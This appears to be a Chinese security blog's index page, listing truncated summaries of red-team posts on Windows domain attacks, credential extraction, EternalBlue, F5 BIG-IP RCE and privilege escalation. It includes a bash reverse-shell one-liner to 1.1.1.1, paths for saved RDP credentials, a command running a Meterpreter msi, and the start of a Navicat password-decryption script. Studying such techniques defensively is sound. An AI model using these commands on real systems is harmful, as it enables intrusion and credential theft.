摘要：###简介 全称：Local Administrator Password Solution 将本地管理员密码存储在LDAP上，作为计算机账户的一个机密属性，配合GPO，实现自动定期修改密码、设置密码长度、强度等，然后配置某些指的账号，能查看存储的密码， 如果用户需要，可以用PowerShell或指 阅读全文

摘要：###常用姿势及重点关注内容 ####查看arp缓存信息，用于枚举局域网存活主机 cat /proc/net/arp ####查看网络设备状态信息和基本统计信息，被ifconfig程序使用，可用于枚举网络接口 cat /proc/net/dev ####查看路由表信息，IP地址为16进制 cat / 阅读全文

摘要：###简介 NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务。最常用于让用户使用 NTLM 协议登录服务器，也用于 NTP 响应认证以及更新计算机域密码 微软MSRC于8月11日 发布了Netlogon 特权提升漏洞安全通告。此漏洞 阅读全文

摘要：###原文地址 https://github.com/zhutougg/RedteamStandard ###工作环境 工作时全部操作均在虚拟机中完成 虚拟机中不登陆个人帐号，如QQ、微信、网盘、CSDN等 渗透环境、开发环境、调试环境需要分开，从目标服务器上下载的程序需要在单独的环境中测试运行 渗 阅读全文

摘要：###转发自推特大佬文章 ####原文链接 https://twitter.com/mohammadaskar2/status/1301263551638761477 ####实战效果 阅读全文

摘要：###目的为了解决msf无法getshell ###脚本如下使用： ###使用Eternalblue模块： ###一路回车后注意选择版本： ###此处注意： ###成功如下： ###使用doublepulsar模块： ###一路回车： ###注意点： ###设置dll： ###一路回车： ###执行 阅读全文

摘要：###使用：Import-Module .\powerview.ps1 ###查看域管用户如下： ###定位域管登录过哪台域机器，获取netsession：Invoke-UserHunter ###获得netsession建立情况：Get-Netsession ###枚举远程机器的tasklists 阅读全文

摘要：###导出软件中的连接记录： ###获得连接密码如下： ###使用脚本解密： ###脚本代码： <?php class NavicatPassword { protected $version = 0; protected $aesKey = 'libcckeylibcckey'; protecte 阅读全文

摘要：###简介： 当用户使用PDF阅读器打开一份恶意的PDF文档，该PDF会向远程SMB服务器发出请求，如果该远程SMB服务器对数据包进行抓取，就能够获得用户Windows系统的NetNTLMHash，通过使用Hashcat暴力破解还原就有可能获得用户系统的明文密码 ###原理： 在PDF规范允许为Go 阅读全文

摘要：###IPC利用 概念：共享”命名管道”的资源，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。 作用：利用IPC$连接者甚至可以与目标主机建立一个连接，利用这个连接，连接者可以得到目标主机上的目录结构、用户列表等信息。 基 阅读全文

摘要：###查看rdp连接记录： ###前提是目标在RDP连接是勾选了保存凭证： ###查找本地的Credentials ： dir /a %userprofile%\AppData\Local\Microsoft\Credentials\* ###获取guidMasterKey: 只要是同一个登录的用户 阅读全文

摘要：##本文仅学习使用！！！请遵守《网络安全法》！用于非法目的与本人无关、与本文分享无关！ ###相关资源列表 https://mitre-attack.github.io/ mitre 科技机构对攻击技术的总结 wiki https://huntingday.github.io MITRE | ATT 阅读全文

摘要：###推荐直接docker，安装版的坑多，容易缺依赖： Github:https://github.com/Veil-Framework/Veil Docker:docker pull mattiasohlsson/veil docker run -it -v /tmp/veil-output:/v 阅读全文

摘要：###介绍： F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。 在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。 未授权的远程攻击者通过向该页面发送特制 阅读全文

摘要：简介： INF文件或安装信息文件是Microsoft Windows用于安装软件和驱动程序的纯文本文件。 INF文件最常用于安装硬件组件的设备驱动程序。Windows包含用于创建基于INF的安装的IExpress工具。 INF文件是Windows安装程序API及其后续版本Windows Instal 阅读全文

摘要：##基本查看 查看端口,得到连接端口为 0xd3d，转换后为 3389： REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber 阅读全文

摘要：Bash TCP: Victim:bash -i >& /dev/tcp/1.1.1.1/6666 0>&1 /bin/bash -i > /dev/tcp/1.1.1.1/6666 0<& 2>&1 exec 5<>/dev/tcp/1.1.1.1/6666;cat <&5 | while rea 阅读全文

摘要：结合test.html 引用 ./avlist.js 实现本地在线查询，页面如下： 查询效果如下： test.html: <!DOCTYPE html> <html> <head> <title>getAVName</title> <meta charset="utf-8"> </head> <bo 阅读全文

摘要：如果计算机的操作系统版本是vista或者更高，在权限不够的情况下，访问系统的磁盘的根目录，windows目录、programfiles目录，以及读写系统登录数据库的程序等操作，都需要经过user account control，用户账户控制的认证才可以进行 需要UAC的授权才能进行的操作：配置Win 阅读全文

摘要：注册表修改： 注册表查询： msf利用：生成msi文件 获得一个meterpreter会话，上传msi文件Upload /root/yang1.msi 另一窗口如下监听： 进入window执行msi文件msiexec /quiet /qn /i yang1.msi /quiet=在安装期间禁止向用户 阅读全文